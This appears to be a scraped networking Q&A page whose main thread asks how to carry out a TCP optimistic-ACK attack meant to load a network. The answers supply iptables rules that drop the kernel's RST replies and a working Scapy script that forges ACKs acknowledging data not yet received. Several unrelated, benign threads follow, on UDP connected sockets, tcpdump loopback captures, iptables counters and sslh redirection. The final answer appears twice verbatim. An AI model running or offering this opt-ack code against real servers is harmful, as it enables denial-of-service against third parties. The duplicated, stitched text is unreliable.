How can I replay TCP traffic between two hosts from a pcap file without triggering the kernel networking stack?

I'm trying to implement an "opt-ack" attack.
This attack involves sending ACK packets before the corresponding data arrives, thus inflating the TCP window and creating a heavy load on the network channel.
I'm using Scapy to record traffic between a client and a server, and then I replay the client's ACK packets one after another.
I have two problems:
I need to stop the kernel from sending packets automatically (it makes the attacker send RST packets), and I also need to fix the timestamps and checksums.
Can you help me with at least the first problem?

The first problem (the RST packets) can be fixed by installing an iptables rule. This worked really well for me in my own packet-replay implementation:
iptables -A OUTPUT -p tcp -d "DST IP ADDR" --sport "SRC PORT" --tcp-flags RST RST -j DROP

The kernel has no knowledge of the segments sent by Scapy: it has no socket bound to the port you are using, so it answers the incoming ACK segments with RST segments.
You can add an iptables rule on the attacker's machine to drop these:
iptables -A OUTPUT -p tcp --tcp-flags RST RST -s source_ip -j DROP
If you modify a segment, delete its checksum fields (del pkt[IP].chksum and del pkt[TCP].chksum) so that Scapy recomputes them when it rebuilds the packet for sending.
Note that invalid checksums in the recorded traffic can be caused by checksum offloading on your machine, which can be disabled with the ethtool command:
ethtool --offload ethX rx off tx off
For the timestamps, I assume you are talking about the TCP Timestamps option. You can forge them before resending the segment with Scapy's TCP options:
ACK = IP(...)/TCP(..., options=[("Timestamp", (TS_value, TS_ecr))])
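Putting the pieces together, here is a minimal sketch of forging such an ACK with Scapy; the addresses, ports, sequence numbers, and timestamp values below are placeholders, not values from your capture:

from scapy.all import IP, TCP, send

# Placeholder endpoints; substitute the values from the recorded session.
attacker_ip, server_ip = "10.0.0.2", "10.0.0.1"
sport, dport = 4444, 80

ack = IP(src=attacker_ip, dst=server_ip) / TCP(
    sport=sport, dport=dport, flags="A",
    seq=1001,    # attacker's next sequence number
    ack=100000,  # optimistically acknowledge data not yet received
    options=[("Timestamp", (123456, 654321))],  # forged (TS_value, TS_ecr)
)

# Deleting the checksum fields forces Scapy to recompute them on send.
del ack[IP].chksum
del ack[TCP].chksum
send(ack, verbose=False)

Run this as root with the RST-dropping rule above in place, otherwise the kernel will reset the connection.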

Related

Purported UDP "connection"

My understanding was that UDP doesn't form connections; it just blindly sends packets. However, when I run
nc -u -l 10002
and
nc -u 127.0.0.1 10002
simultaneously (so that I can send messages back and forth between the terminals), lsof reports two open UDP connections:
nc ... UDP localhost:10002->localhost:35311
nc ... UDP localhost:35311->localhost:10002
If I open a third terminal and run nc -u 127.0.0.1 10002 again, to send another message to the original listener, the listener does not receive (or at least does not acknowledge) the message, suggesting that it is indeed tied to a specific connection.
If I implement a UDP echo server in Java like this and do roughly the same thing (on port 10001), I get
java ... UDP *:10001
nc ... UDP localhost:52295->localhost:10001
That is, Java is just listening on 10001, while nc has formed a connection.
Based on my understanding of UDP, I'd expect both sides to behave like the Java version. What's going on? Can I make the Java version do whatever nc is doing? Is there a benefit to doing so?
I'm on Ubuntu 20.04.3 LTS.
UDP sockets can be connected (after a call to connect) or unconnected. In the first case the socket can only exchange data with the connected peer, while in the second case it can exchange data with arbitrary peers. What you see in lsof is whether or not the socket is connected.
My understanding was that UDP doesn't form connections; it just blindly sends packets.
That's a different meaning of the term "connection" here. TCP always has "real" connections, i.e. an association between two endpoints with a clear start (SYN-based handshake) and end (FIN-based teardown). TCP sockets used for data exchange are therefore always connected.
UDP can have associations between two endpoints too, i.e. it can have connected sockets, but there is no explicit setup or teardown of such a connection, and UDP sockets don't need to be connected. From looking at the traffic alone, it therefore cannot be determined whether connected or unconnected UDP sockets are in use.
Can I make the Java version do whatever nc is doing?
Yes, see What does Java's UDP DatagramSocket.connect() do?
Is there a benefit to doing so?
An unconnected UDP socket will receive data from any peer, so the application has to check for each received datagram where it came from and whether it should be accepted. A connected UDP socket will only receive data from the connected peer, so no such checks are needed in the application.
Apart from that, using different sockets for communication with different peers might scale better. But if only a few packets are exchanged with each peer, or if one needs to communicate with lots of peers at the same time, then using multiple connected sockets instead of a single unconnected one might mean too much overhead.
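To illustrate the difference in code, here is a small Python sketch; Java's DatagramSocket.connect() gives the same behavior, and the address and port are placeholders:

import socket

# Unconnected UDP socket (like the Java echo server): bound to a port,
# it receives datagrams from any peer and must track sources itself.
server = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
server.bind(("127.0.0.1", 10001))

# Connected UDP socket (what nc does): connect() merely records the peer
# address in the kernel; no packets are exchanged, but lsof now shows a
# "connection" and the socket only accepts datagrams from that peer.
client = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
client.connect(("127.0.0.1", 10001))

client.send(b"hello")               # send()/recv() work once connected
data, peer = server.recvfrom(2048)  # the server still sees arbitrary peers
server.sendto(data, peer)           # echo the datagram back
print(client.recv(2048))            # b'hello'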

Why does tcpdump on the loopback interface only capture half the packets received by the filter?

I am trying to understand why, when using tcpdump on the loopback interface, only half of the packets received by the filter are captured,
yet when I run the exact same traffic and use tcpdump on the eth0 interface, all the traffic is captured.
In both cases I am targeting specific ports, both with the traffic and with the tcpdump filter.
I spotted a similar question on here: why tcpdump captures only half the packets.
The suggestion there was that tcpdump was filtering out duplicates sent and received at the interface, but that question was looking at the whole interface rather than singling out specific ports. That does not appear to be the case here, as I am capturing on specific ports, with the source and destination ports of the traffic being different. Also, looking at eth0 with the same traffic, I can see all the captured packets that are received by both the lo and eth0 filters.
For example, when I send 10 UDP packets to both eth0 and lo, I get the following:
tcpdump -i eth0 udp port xxxx
10 packets captured
10 packets received by filter
0 packets dropped by kernel
tcpdump -i lo udp port xxxx
5 packets captured
10 packets received by filter
0 packets dropped by kernel
So it looks like tcpdump is filtering traffic only on the loopback, possibly grabbing every second packet. The timestamps seem to confirm this: if I send packets at a rate of 1 per second, on eth0 the captured packets appear at 1-second intervals, while on lo they appear at 2-second intervals.
Is there some default configuration for tcpdump on a loopback interface that causes it to filter out every second packet?
Or am I misunderstanding something? It seems strange that tcpdump would operate differently depending on the interface chosen.
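For reference, a minimal Python sender that reproduces the test; the port is a placeholder for the xxxx in the capture filter:

import socket, time

PORT = 10002  # placeholder for the xxxx port in the tcpdump filter
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
for i in range(10):
    s.sendto(b"probe", ("127.0.0.1", PORT))  # loopback test; use the
    time.sleep(1)                            # eth0 address for the eth0 run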

iptables: packet counter behavior for MASQUERADE rule

I noticed a "strange" behavior of the packet counter for the POSTROUTING chain (MASQUERADE rule) on my "router" (CentOS 7): when I ping the outside world from the NATed LAN, the pkts field does not increase by as many as the number of ping requests I sent.
For example, if I send 10 ICMP echo requests using ping <dest-ip> -c 10, the pkts field of the POSTROUTING chain only increases by 1. If I ping one packet at a time (i.e., issue multiple ping -c 1 <dest-ip> commands), the pkts field usually increases as expected (if the time gap between consecutive ping commands is long enough).
Chain POSTROUTING (policy ACCEPT 50 packets, 3302 bytes)
pkts bytes target prot opt in out source destination
63 4696 MASQUERADE all -- * eth0 172.16.1.0/24 0.0.0.0/0
For the same ping test, I watched the pkts field in both the PREROUTING and FORWARD chains. The counter behavior is the same for the PREROUTING and POSTROUTING chains, but the FORWARD chain behaves "normally": its counter increases by exactly the number of ICMP packets I sent.
Using Wireshark to capture the ICMP packets at both the client and the "router" shows that the ICMP request/reply traffic matches the ping commands.
I guess I am missing some knowledge about this particular packet counter behavior. Can you please point me to a source of information on this?
Thanks a lot.

How to redirect and load balance locally generated packets through iptables?

Here is the scenario I am working on.
I have sslh listening on 443, which redirects HTTPS traffic to 445 and TURN traffic to 3478. I also have 6 TURN servers listening on ports 3478 to 3483, and I wish to load balance the incoming TURN traffic across all of these ports. I tried load balancing through the PREROUTING chain of the nat table, but that didn't work: sslh is a local process, and packets generated by it skip the PREROUTING chain. I can see these packets coming from sslh in the OUTPUT chain of the nat table, but I am unable to redirect them to another port.
Here is the rule I am using:
iptables -t nat -A OUTPUT -p tcp -o lo --dport 3478 -j REDIRECT --to-ports 3479
which is not working. Any help is highly appreciated!
Try using coturn's built-in load balancing instead, via the alternate-server option.
There is an example in the coturn source: https://github.com/coturn/coturn/blob/master/examples/scripts/loadbalance/master_relay.sh
I had missed adding the transparency rules for sslh. After adding those rules, I was able to redirect the packets to different ports.

tcpdump to capture packets with erroneous IP flags

I am using:
# tcpdump -i gphy -vv -B 28000 -s 120 -w log.pcap tcp portrange 10032-10001
to capture packets that I send out from a host, and I notice that all the packets with altered IP flags are missing. Is there a way to capture all packets even if the IP flags field is not correctly programmed?
This non-deterministic behaviour can occur for several reasons: for example, incorrectly setting the 'Do Not Fragment' bit in the IP flags may result in the packet being dropped. You should first make sure that you have set the IP flags field correctly and verify that the packet is actually being sent. If it is being sent (and not dropped in transit), the given command should capture all packets that match the filter.
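One way to verify this is to craft such a packet yourself. Here is a minimal Scapy sketch that sets the DF bit explicitly; the destination address and port are placeholders:

from scapy.all import IP, TCP, send

# Craft a SYN segment with the DF (Don't Fragment) IP flag set explicitly.
pkt = IP(dst="192.0.2.1", flags="DF") / TCP(dport=10032, flags="S")
send(pkt, verbose=False)

If this crafted packet shows up in the capture while your original traffic does not, the original packets are most likely being dropped before they reach the wire rather than being missed by tcpdump.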
This non deterministic behaviour could occur due to multiple potential reasons, such as incorrectly setting the 'Do Not Fragment' bit in IP flags, which may result in the packet being dropped. Perhaps you should ensure that you've correctly set the IP flags field to check whether the packet is being sent. If it is being sent (and not being dropped during transmission), with the given command you should be able to capture all packets (provided they match the filter).